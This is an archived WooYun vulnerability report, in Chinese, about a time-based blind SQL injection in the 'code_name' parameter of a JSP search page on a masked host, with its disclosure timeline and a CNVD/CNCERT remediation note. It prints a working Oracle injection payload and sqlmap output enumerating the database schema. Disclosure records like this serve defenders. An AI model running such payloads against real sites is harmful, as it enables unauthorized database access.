乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
http://**.**.**.**/sofpro/ext_researchmanage/search1.jsp?code_name=qianj&keyword=
---Parameter: code_name (GET) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: code_name=qianj' AND 7421=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(111)||CHR(69)||CHR(97),5) AND 'lBtT'='lBtT&keyword=---[15:31:35] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[15:31:35] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[15:31:35] [INFO] fetching database (schema) names[15:31:35] [INFO] fetching number of databases[15:31:35] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y[15:31:43] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [15:31:49] [ERROR] invalid character detected. retrying..[15:31:49] [WARNING] increasing time delay to 6 seconds [15:31:58] [ERROR] invalid character detected. retrying..[15:31:58] [WARNING] increasing time delay to 7 seconds [15:32:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[15:32:00] [ERROR] unable to retrieve the number of databases[15:32:00] [INFO] falling back to current database[15:32:00] [INFO] fetching current database[15:32:00] [INFO] resumed: CMSPRO[15:32:00] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSesavailable databases [1]:[*] CMSPRO
危害等级:中
漏洞Rank:10
确认时间:2015-11-20 17:52
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给湖北分中心,由湖北分中心后续协调网站管理单位处置。
暂无